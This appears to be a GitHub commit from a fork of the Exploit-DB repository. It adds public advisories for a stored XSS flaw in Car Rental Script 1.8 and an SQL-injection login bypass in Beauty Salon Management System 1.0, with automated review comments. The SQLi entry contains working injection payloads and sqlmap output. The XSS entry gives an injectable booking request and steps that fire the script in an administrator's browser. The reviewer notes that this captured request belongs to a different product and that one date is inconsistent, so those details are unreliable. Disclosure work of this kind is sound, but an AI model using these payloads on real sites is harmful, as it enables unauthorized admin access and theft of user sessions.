forked from offensive-security/exploitdb
Commit
4 changes to exploits/shellcodes/ghdb

Beauty Salon Management System v1.0 - SQLi
Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
Exploit-DB committed Jul 5, 2023 (1 parent ef9b4e5, commit 9461677)
Showing 4 changed files with 243 additions and 2 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS) | ||
# Date: 30/07/2023 | ||
# Exploit Author: CraCkEr | ||
# Vendor: GZ Scripts | ||
# Vendor Homepage: https://gzscripts.com/ | ||
# Software Link: https://gzscripts.com/car-rental-php-script.html | ||
# Version: 1.8 | ||
# Tested on: Windows 10 Pro | ||
# Impact: Manipulate the content of the site | ||
|
||
Release Notes: | ||
|
||
Allow Attacker to inject malicious code into website, give ability to steal sensitive | ||
information, manipulate data, and launch additional attacks. | ||
|
||
## Stored XSS | ||
----------------------------------------------- | ||
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1 | ||
|
||
payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1 | ||
----------------------------------------------- | ||
|
||
POST parameter 'first_name' is vulnerable to XSS | ||
POST parameter 'second_name' is vulnerable to XSS | ||
POST parameter 'phone' is vulnerable to XSS | ||
POST parameter 'address_1' is vulnerable to XSS | ||
POST parameter 'country' is vulnerable to XSS | ||
|
||
|
||
## Steps to Reproduce: | ||
|
||
1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car | ||
2. Inject your [XSS Payload] in "First Name" | ||
3. Inject your [XSS Payload] in "Last Name" | ||
4. Inject your [XSS Payload] in "Phone" | ||
5. Inject your [XSS Payload] in "Address Line 1" | ||
6. Inject your [XSS Payload] in "Country" | ||
7. Accept with terms & Press [Booking] | ||
XSS Fired on Local User Browser. | ||
8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) | ||
XSS Will Fire and Executed on his Browser | ||
9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) | ||
XSS Will Fire and Executed on his Browser |
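Review bot: The captured request on the 'POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout...' line does not match the rest of this advisory. The title and the reproduction steps describe the Car Rental Script (pickup/return location, rental age, admin paths at 'index.php?controller=GzAdmin&action=dashboard' and 'controller=GzBooking&action=index'), while the request body carries event booking parameters ('event_id', 'event_prices[...]', 'create_booking'), so it is unclear which product and endpoint the stored XSS was actually verified against; replace it with the booking request that the steps exercise, or state explicitly that the same GzFront checkout handler is shared by both products. Two smaller points: '# Date: 30/07/2023' is later than the commit date (Jul 5, 2023), so the date looks mistyped, and the placeholders 'second_name=[XSS Payload', 'phone=[XSS Payload', 'address_1=[XSS Payload' and 'country=[XSS Payload' are missing their closing brackets. The 'Release Notes:' heading labels what is really an impact summary and should be renamed accordingly.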
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,75 @@ | ||
# Exploit Title: Beauty Salon Management System v1.0 - SQLi | ||
# Date of found: 04/07/2023 | ||
# Exploit Author: Fatih Nacar | ||
# Version: V1.0 | ||
# Tested on: Windows 10 | ||
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/> | ||
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/ | ||
# CWE: CWE-89 | ||
|
||
Vulnerability Description - | ||
|
||
Beauty Salon Management System: V1.0, developed by Campcodes, has been | ||
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability | ||
allows an attacker to manipulate login authentication with the SQL queries | ||
and bypass authentication. The system fails to properly validate | ||
user-supplied input in the username and password fields during the login | ||
process, enabling an attacker to inject malicious SQL code. By exploiting | ||
this vulnerability, an attacker can bypass authentication and gain | ||
unauthorized access to the system. | ||
|
||
Steps to Reproduce - | ||
|
||
The following steps outline the exploitation of the SQL Injection | ||
vulnerability in Beauty Salon Management System V1.0: | ||
|
||
1. Open the admin login page by accessing the URL: | ||
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php | ||
|
||
2. In the username and password fields, insert the following SQL Injection | ||
payload shown inside brackets to bypass authentication for usename | ||
parameter: | ||
|
||
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 | ||
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign | ||
In} | ||
|
||
3.Execute the SQL Injection payload. | ||
|
||
As a result of successful exploitation, the attacker gains unauthorized | ||
access to the system and is logged in with administrative privileges. | ||
|
||
Sqlmap results: | ||
|
||
POST parameter 'username' is vulnerable. Do you want to keep testing the | ||
others (if any)? [y/N] y | ||
|
||
sqlmap identified the following injection point(s) with a total of 793 | ||
HTTP(s) requests: | ||
|
||
--- | ||
|
||
Parameter: username (POST) | ||
|
||
Type: boolean-based blind | ||
|
||
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) | ||
|
||
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 | ||
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign | ||
In | ||
|
||
Type: time-based blind | ||
|
||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | ||
|
||
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)-- | ||
rvYF&password=test&login=Sign In | ||
|
||
--- | ||
|
||
[15:58:56] [INFO] the back-end DBMS is MySQL | ||
|
||
web application technology: PHP 8.2.4, Apache 2.4.56 | ||
|
||
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) |
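Review bot: The '# Vendor Homepage' line carries a second, angle-bracketed URL for a different Campcodes project (retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli), which contradicts the '# Software Link' for the Beauty Salon Management System on the next line; drop the pasted link so the header identifies one product. The description states that input is not validated "in the username and password fields" and step 2 says to insert the payload in both fields, but the only evidence in the file is the sqlmap result for the 'username' POST parameter (both listed payloads leave 'password=test' untouched), so the affected-parameter claim should be narrowed to 'username' unless the password field was also confirmed. Minor: "usename" in step 2 should read "username", and "3.Execute" is missing the space after the list number used by steps 1 and 2.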